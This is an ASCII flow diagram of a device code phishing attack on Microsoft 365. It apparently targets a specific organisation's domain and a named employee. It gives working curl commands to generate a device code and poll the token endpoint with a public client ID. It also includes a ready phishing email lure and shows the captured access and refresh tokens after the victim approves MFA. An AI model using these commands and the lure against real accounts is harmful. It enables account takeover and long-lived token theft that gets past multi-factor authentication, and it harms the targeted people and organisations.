┌─────────────────────────────────────────────────────────────────────────────┐
│                        DEVICE CODE PHISHING FLOW                            │
└─────────────────────────────────────────────────────────────────────────────┘

STEP 1: Attacker generates device code (BEFORE sending phish)
─────────────────────────────────────────────────────────────
   
   Attacker runs:
   ┌──────────────────────────────────────────────────────────────────────┐
   │ curl -X POST "https://login.microsoftonline.com/wearesocial.com/    │
   │       oauth2/v2.0/devicecode"                                        │
   │   -d "client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c"               │
   │   -d "scope=https://graph.microsoft.com/.default offline_access"    │
   └──────────────────────────────────────────────────────────────────────┘
   
   Microsoft returns:
   ┌──────────────────────────────────────────────────────────────────────┐
   │ {                                                                    │
   │   "user_code": "ABCD-1234",           ← Send this to victim         │
   │   "device_code": "DAQABAAEAAAm...",   ← Attacker keeps this SECRET  │
   │   "verification_uri": "https://microsoft.com/devicelogin",          │
   │   "expires_in": 900                                                  │
   │ }                                                                    │
   └──────────────────────────────────────────────────────────────────────┘


STEP 2: Attacker sends phishing email
─────────────────────────────────────
   
   ┌──────────────────────────────────────────────────────────────────────┐
   │ To: david.whybrow@wearesocial.com                                   │
   │ Subject: Action Required: Verify Your Microsoft 365 Sign-in         │
   │                                                                      │
   │ Please verify your device at:                                        │
   │ https://microsoft.com/devicelogin    ← REAL Microsoft URL           │
   │                                                                      │
   │ Enter code: ABCD-1234                                                │
   └──────────────────────────────────────────────────────────────────────┘


STEP 3: Attacker starts polling (runs in background)
────────────────────────────────────────────────────
   
   While waiting for victim, attacker polls every 5 seconds:
   ┌──────────────────────────────────────────────────────────────────────┐
   │ curl -X POST "https://login.microsoftonline.com/wearesocial.com/    │
   │       oauth2/v2.0/token"                                             │
   │   -d "grant_type=urn:ietf:params:oauth:grant-type:device_code"      │
   │   -d "client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c"               │
   │   -d "device_code=DAQABAAEAAAm..."    ← The secret device_code      │
   └──────────────────────────────────────────────────────────────────────┘
   
   Response (while waiting): {"error": "authorization_pending"}
   

STEP 4: Victim clicks link and enters code
──────────────────────────────────────────
   
   Victim goes to: https://microsoft.com/devicelogin (REAL site)
                            │
                            ▼
                   ┌─────────────────┐
                   │  Enter code:    │
                   │  [ABCD-1234]    │  ← Victim enters code
                   │  [Continue]     │
                   └─────────────────┘
                            │
                            ▼
                   Microsoft redirects to Okta (federation)
                            │
                            ▼
                   ┌─────────────────────────────────┐
                   │  wearesocial.okta.com           │
                   │  ─────────────────────────────  │
                   │  Username: [david.whybrow]      │
                   │  Password: [**********]         │
                   │  [Sign In]                      │
                   └─────────────────────────────────┘
                            │
                            ▼
                   ┌─────────────────────────────────┐
                   │  Okta Verify                    │
                   │  ─────────────────────────────  │
                   │  🔔 Push notification sent      │
                   │  Approve on your phone          │
                   └─────────────────────────────────┘
                            │
                   Victim approves MFA (thinks it's legit)
                            │
                            ▼
                   ┌─────────────────────────────────┐
                   │  ✓ Device verified              │
                   │  You can close this window      │
                   └─────────────────────────────────┘


STEP 5: Attacker's polling succeeds - TOKEN RECEIVED
────────────────────────────────────────────────────
   
   The SAME polling request now returns:
   ┌──────────────────────────────────────────────────────────────────────┐
   │ {                                                                    │
   │   "access_token": "eyJ0eXAiOiJKV1QiLC...",   ← ATTACKER HAS THIS    │
   │   "refresh_token": "0.AVEA8P9ExIEh6E...",   ← Long-lived access!    │
   │   "token_type": "Bearer",                                            │
   │   "expires_in": 3600                                                 │
   │ }                                                                    │
   └──────────────────────────────────────────────────────────────────────┘
   
   🎯 ATTACKER NOW HAS VALID ACCESS TOKEN
